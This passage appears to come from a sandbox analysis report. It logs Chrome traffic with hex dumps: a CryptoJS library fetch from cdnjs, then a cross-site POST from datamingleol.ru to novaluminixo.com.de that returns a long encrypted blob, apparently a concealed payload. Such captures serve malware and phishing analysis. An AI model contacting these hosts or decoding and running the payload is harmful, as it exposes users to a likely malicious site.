                                      Host: cdnjs.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:20 UTC960INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:16:20 GMT
                                      Content-Type: application/javascript; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Access-Control-Allow-Origin: *
                                      Cache-Control: public, max-age=30672000
                                      ETag: W/"5eb03e2d-bb78"
                                      Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                      cf-cdnjs-via: cfworker/kv
                                      Cross-Origin-Resource-Policy: cross-origin
                                      Timing-Allow-Origin: *
                                      X-Content-Type-Options: nosniff
                                      CF-Cache-Status: HIT
                                      Age: 157950
                                      Expires: Wed, 03 Sep 2025 13:16:20 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMZiif9k83wl6kSE98xNZB9jOtks0F3U%2F3kNUIzl9IXFeT7Nz70EI0ilWNKthQgQJdQOFdSGSYU2gV1OxvVqFb9O%2BzCyZo8HDlAIU546H1Yg7ro9%2Fw1rGZXWORX0z8bjfl%2FmW5aD"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=15780000
                                      Server: cloudflare
                                      CF-RAY: 8c28694279f343a7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:20 UTC409INData Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                      Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                      2024-09-13 13:16:20 UTC1369INData Raw: 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f
                                      Data Ascii: t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeo
                                      2024-09-13 13:16:20 UTC1369INData Raw: 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63
                                      Data Ascii: =0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:func
                                      2024-09-13 13:16:20 UTC1369INData Raw: 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63
                                      Data Ascii: (t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProc
                                      2024-09-13 13:16:20 UTC1369INData Raw: 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30
                                      Data Ascii: ===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0
                                      2024-09-13 13:16:20 UTC1369INData Raw: 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30
                                      Data Ascii: (e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0
                                      2024-09-13 13:16:20 UTC1369INData Raw: 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36
                                      Data Ascii: -o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=429496
                                      2024-09-13 13:16:20 UTC1369INData Raw: 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29
                                      Data Ascii: A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38])
                                      2024-09-13 13:16:20 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c
                                      Data Ascii: one.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<
                                      2024-09-13 13:16:20 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29
                                      Data Ascii: function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.449784188.114.96.34434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:20 UTC609OUTPOST // HTTP/1.1
                                      Host: novaluminixo.com.de
                                      Connection: keep-alive
                                      Content-Length: 26
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-platform: "Windows"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Content-Type: text/plain;charset=UTF-8
                                      Accept: */*
                                      Origin: https://datamingleol.ru
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Referer: https://datamingleol.ru/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:20 UTC26OUTData Raw: 7b 22 73 61 63 68 65 74 22 3a 22 73 61 63 72 69 66 69 63 69 61 6c 6c 79 22 7d
                                      Data Ascii: {"sachet":"sacrificially"}
                                      2024-09-13 13:16:22 UTC653INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:16:22 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.3.33
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Sp%2FyFX3JO7DVDzmH4zy4MOknXMHeMSSqYG8VxrRbliZB7PMN1kD3i1qYeH7loPSfArR52PKkBzMq1nKqa7q7gOz%2F9%2F4EKpejmxP%2FsrwZMuOfqiQ160fN8egh%2BB3pkXjrRdL0441"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c286946589ac481-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:22 UTC716INData Raw: 34 39 33 34 0d 0a 7b 22 61 22 3a 22 41 48 74 36 37 6f 70 37 5c 2f 63 73 70 30 59 69 69 39 59 2b 49 4c 78 6a 79 79 52 56 52 4e 31 56 72 59 49 4f 6d 4b 63 79 6b 69 51 77 6b 68 51 2b 6c 73 54 67 41 38 66 65 4d 63 5c 2f 49 73 46 4b 67 4d 41 47 6d 78 30 69 6a 4c 44 48 6d 36 7a 69 6e 4e 5c 2f 35 63 35 33 67 36 37 46 54 4f 33 6f 78 54 6c 32 42 46 59 4f 6e 66 54 48 36 58 48 54 30 2b 55 6f 46 46 75 4e 47 44 34 41 5c 2f 78 44 4c 4a 4d 36 74 49 75 7a 53 6c 6a 31 4c 41 4c 62 6a 73 4c 4d 6d 50 75 77 74 76 6d 37 4e 54 68 30 77 4a 41 6b 5a 2b 66 35 31 59 33 36 6f 44 37 4a 30 44 76 62 38 71 6c 75 53 67 30 57 61 4b 30 36 6c 79 2b 62 78 32 73 54 51 54 34 6e 64 4d 61 43 78 49 75 37 55 62 72 34 43 75 73 54 35 55 4b 4d 6a 33 6b 52 46 50 44 41 41 61 36 4f 44 71 53 5a 4a 4b 71
                                      Data Ascii: 4934{"a":"AHt67op7\/csp0Yii9Y+ILxjyyRVRN1VrYIOmKcykiQwkhQ+lsTgA8feMc\/IsFKgMAGmx0ijLDHm6zinN\/5c53g67FTO3oxTl2BFYOnfTH6XHT0+UoFFuNGD4A\/xDLJM6tIuzSlj1LALbjsLMmPuwtvm7NTh0wJAkZ+f51Y36oD7J0Dvb8qluSg0WaK06ly+bx2sTQT4ndMaCxIu7Ubr4CusT5UKMj3kRFPDAAa6ODqSZJKq
                                      2024-09-13 13:16:22 UTC1369INData Raw: 30 74 64 31 33 4a 59 38 65 67 74 4e 58 6a 6f 77 56 58 66 71 57 42 77 42 33 71 78 6b 76 76 6b 56 39 6f 58 50 66 4f 6c 76 72 42 34 6e 66 58 52 34 45 49 56 75 4b 6b 52 4d 2b 30 6a 6d 63 5a 4f 75 67 32 4b 57 43 51 55 37 34 36 42 76 68 72 34 41 61 30 61 56 57 76 4c 33 5c 2f 49 52 75 71 62 64 39 43 4d 7a 46 36 31 4b 6d 71 41 78 6d 4f 6f 4a 4b 33 7a 54 46 46 66 6a 46 44 6c 42 2b 56 4e 7a 39 66 64 55 64 65 70 54 75 6a 33 47 38 37 35 5c 2f 47 38 44 31 73 59 51 6d 47 4e 4e 4e 31 6c 32 47 2b 6b 49 37 7a 7a 71 31 62 76 67 6d 43 34 44 61 48 37 6b 35 30 6d 6a 6d 7a 5c 2f 6c 5a 30 76 66 55 4b 59 4d 5a 35 50 77 79 44 48 41 57 59 32 38 47 30 51 76 65 61 5a 6d 44 58 6c 64 55 37 41 4e 61 65 32 34 36 76 77 35 48 4d 50 75 56 73 35 79 66 70 72 44 4d 5c 2f 4b 41 70 4b 73 64 32
                                      Data Ascii: 0td13JY8egtNXjowVXfqWBwB3qxkvvkV9oXPfOlvrB4nfXR4EIVuKkRM+0jmcZOug2KWCQU746Bvhr4Aa0aVWvL3\/IRuqbd9CMzF61KmqAxmOoJK3zTFFfjFDlB+VNz9fdUdepTuj3G875\/G8D1sYQmGNNN1l2G+kI7zzq1bvgmC4DaH7k50mjmz\/lZ0vfUKYMZ5PwyDHAWY28G0QveaZmDXldU7ANae246vw5HMPuVs5yfprDM\/KApKsd2
                                      2024-09-13 13:16:22 UTC1369INData Raw: 34 39 72 4f 35 42 51 37 55 76 39 57 53 4a 37 70 4d 52 4d 42 48 76 66 73 63 39 79 6b 7a 5a 4c 5c 2f 52 57 42 48 51 71 36 4a 34 52 50 4b 77 42 41 49 56 4a 51 36 47 59 34 33 33 35 62 6e 6a 32 51 61 4b 59 61 41 39 67 58 2b 42 6f 67 44 46 31 6d 59 46 68 4b 67 45 31 45 2b 6f 5c 2f 58 6b 4d 30 4b 51 43 5c 2f 32 4c 45 48 64 78 4d 45 68 4e 42 6c 47 4d 32 33 70 50 30 6e 31 2b 65 64 7a 37 41 69 47 33 37 77 77 76 6a 79 4d 50 50 36 42 58 4b 72 35 57 61 39 32 38 78 75 4a 75 4a 77 6d 6a 4c 7a 73 65 54 38 42 6a 62 4a 2b 58 4c 66 73 6c 70 6d 41 76 44 71 6a 6d 76 4c 42 48 41 41 76 6f 47 63 52 6d 74 44 42 30 43 76 79 42 5c 2f 65 73 36 37 52 36 6d 65 41 42 55 30 64 44 42 54 4f 4d 62 5c 2f 54 54 4b 2b 2b 30 32 33 5c 2f 30 64 31 48 74 64 72 41 5c 2f 43 79 76 4b 30 49 4f 43 57
                                      Data Ascii: 49rO5BQ7Uv9WSJ7pMRMBHvfsc9ykzZL\/RWBHQq6J4RPKwBAIVJQ6GY4335bnj2QaKYaA9gX+BogDF1mYFhKgE1E+o\/XkM0KQC\/2LEHdxMEhNBlGM23pP0n1+edz7AiG37wwvjyMPP6BXKr5Wa928xuJuJwmjLzseT8BjbJ+XLfslpmAvDqjmvLBHAAvoGcRmtDB0CvyB\/es67R6meABU0dDBTOMb\/TTK++023\/0d1HtdrA\/CyvK0IOCW
                                      2024-09-13 13:16:22 UTC1369INData Raw: 4a 78 68 6d 65 49 56 65 35 31 6c 61 62 65 43 79 47 44 6b 38 39 59 64 74 55 7a 30 48 71 66 36 78 49 57 52 4c 59 42 5a 4c 7a 72 4e 30 2b 44 59 32 4f 6e 74 4a 5c 2f 43 61 38 6f 59 67 71 38 33 37 71 55 47 4d 4b 38 52 48 73 31 2b 2b 45 49 77 41 73 7a 77 31 46 77 76 35 51 71 68 59 67 4d 50 53 75 39 72 6f 4e 4d 45 37 76 4a 4e 54 49 77 42 58 4c 6c 62 4b 6c 2b 76 59 31 51 4a 47 74 33 34 6f 6a 55 51 61 61 77 31 50 70 65 42 67 51 43 58 72 45 62 79 5c 2f 38 6c 7a 48 39 4d 57 72 69 62 48 42 59 6a 35 72 71 6b 31 6f 43 68 52 68 46 73 46 32 6f 50 65 75 56 75 4e 76 6b 44 4a 2b 54 77 33 6c 54 50 75 35 68 37 50 35 70 37 50 4d 64 48 59 51 68 64 2b 6d 36 37 4d 74 36 53 4e 6a 66 65 6d 4d 53 5a 31 50 65 58 67 42 46 66 70 7a 50 45 33 52 63 75 36 64 46 42 53 62 38 2b 62 66 56 64
                                      Data Ascii: JxhmeIVe51labeCyGDk89YdtUz0Hqf6xIWRLYBZLzrN0+DY2OntJ\/Ca8oYgq837qUGMK8RHs1++EIwAszw1Fwv5QqhYgMPSu9roNME7vJNTIwBXLlbKl+vY1QJGt34ojUQaaw1PpeBgQCXrEby\/8lzH9MWribHBYj5rqk1oChRhFsF2oPeuVuNvkDJ+Tw3lTPu5h7P5p7PMdHYQhd+m67Mt6SNjfemMSZ1PeXgBFfpzPE3Rcu6dFBSb8+bfVd
                                      2024-09-13 13:16:22 UTC1369INData Raw: 61 57 4d 4c 46 46 51 43 72 79 4b 45 7a 59 70 70 4e 61 2b 71 55 6a 55 52 79 37 44 55 47 49 35 75 7a 38 79 4d 65 6f 77 33 67 7a 63 77 71 30 4f 57 44 67 45 42 45 45 6f 37 4b 69 6f 72 6c 5a 39 5a 54 76 44 6e 56 7a 61 37 56 4b 4b 51 66 31 4e 39 69 54 4e 4a 48 6d 66 35 69 56 6d 42 55 57 4b 42 37 4f 50 48 70 4f 46 69 5a 32 4a 70 34 38 51 38 39 57 39 2b 68 62 35 45 4b 7a 52 6f 54 77 56 32 54 5a 52 35 39 7a 67 2b 4b 59 76 59 59 6a 78 4e 6b 30 5c 2f 31 6c 54 39 50 44 76 61 2b 66 5a 33 69 69 42 5a 66 57 73 76 7a 4c 4d 52 4f 79 73 46 35 73 75 4d 61 61 65 41 31 78 33 39 33 58 55 65 57 78 6a 45 65 54 44 71 6b 67 6a 57 4c 67 63 76 34 74 75 54 34 65 41 6d 33 4c 50 48 79 53 39 4e 53 42 67 79 34 71 4a 63 42 73 68 6a 34 46 6b 6a 5c 2f 58 38 6f 52 73 4a 44 38 72 73 54 72 33
                                      Data Ascii: aWMLFFQCryKEzYppNa+qUjURy7DUGI5uz8yMeow3gzcwq0OWDgEBEEo7KiorlZ9ZTvDnVza7VKKQf1N9iTNJHmf5iVmBUWKB7OPHpOFiZ2Jp48Q89W9+hb5EKzRoTwV2TZR59zg+KYvYYjxNk0\/1lT9PDva+fZ3iiBZfWsvzLMROysF5suMaaeA1x393XUeWxjEeTDqkgjWLgcv4tuT4eAm3LPHyS9NSBgy4qJcBshj4Fkj\/X8oRsJD8rsTr3
